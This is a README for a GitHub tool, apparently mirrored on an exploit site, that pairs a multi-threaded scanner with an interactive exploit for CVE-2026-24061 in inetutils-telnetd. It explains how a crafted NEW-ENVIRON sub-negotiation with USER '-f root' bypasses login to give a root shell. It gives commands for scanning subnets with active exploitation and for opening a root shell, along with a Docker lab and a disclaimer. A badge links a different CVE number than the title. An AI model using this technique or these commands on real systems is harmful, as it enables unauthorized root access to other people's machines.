## https://sploitus.com/exploit?id=DBBC7D3D-9D8D-59E0-ACBD-0A708083D574
# CVE-2026-24061 Vulnerability Scanner & Exploit
[](LICENSE)
[](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)
> **๐จโ๐ป Author:** Furkan KAYAPINAR ([@FurkanKAYAPINAR](https://github.com/FurkanKAYAPINAR))
## Overview
This repository contains a vulnerability scanner and an interactive exploit for **CVE-2026-24061**. This vulnerability affects `inetutils-telnetd` (and potentially other Telnet implementations) through improper handling of the `NEW-ENVIRON` Telnet option, allowing for remote pre-authentication access using the `-f root` payload.
## Features
- **scanner.py**: A multi-threaded, efficient scanner supporting single targets, CIDR subnets, and IP lists. It includes an optional `--exploit` flag for verifying RCE.
- **exploit.py**: A robust, interactive Telnet client that automates the exploit chain and drops the user into a root shell upon success.
- **Lab Environment**: A Dockerized Ubuntu environment running a vulnerable version of `inetutils-telnetd` for safe testing.
## Installation
Ensure you have Python 3.x installed.
```bash
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## Usage
```
### 1. Vulnerability Scanner
Scan targets for the `NEW-ENVIRON` vulnerability.
```bash
# Scan a single target
python3 scanner.py -t 192.168.1.100 -p 1903
# Scan a subnet
python3 scanner.py -s 192.168.1.0/24 -p 1903
# Scan a list of IPs and attempt active exploitation (RCE check)
python3 scanner.py -l ips.txt -p 1903 --exploit
```
### 2. Interactive Exploit
Gain interactive root shell access.
```bash
python3 exploit.py -t 127.0.0.1 -p 1903
```
## Lab Environment Setup
Deploy a local vulnerable environment for testing:
1. Navigate to the lab directory:
```bash
cd lab
```
2. Build and start the container:
```bash
docker-compose up -d --build
```
*The service will be listening on port **1903**.*
## Technical Details
The vulnerability is triggered during the Telnet negotiation phase. By responding to the server's `DO NEW-ENVIRON` request with a specially crafted `IS VAR "USER" VALUE "-f root"` sub-negotiation packet, the server-side `telnetd` process is tricked into passing the `-f root` flag to the `login` process, bypassing authentication.
## Disclaimer
> [!WARNING]
> This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and unethical.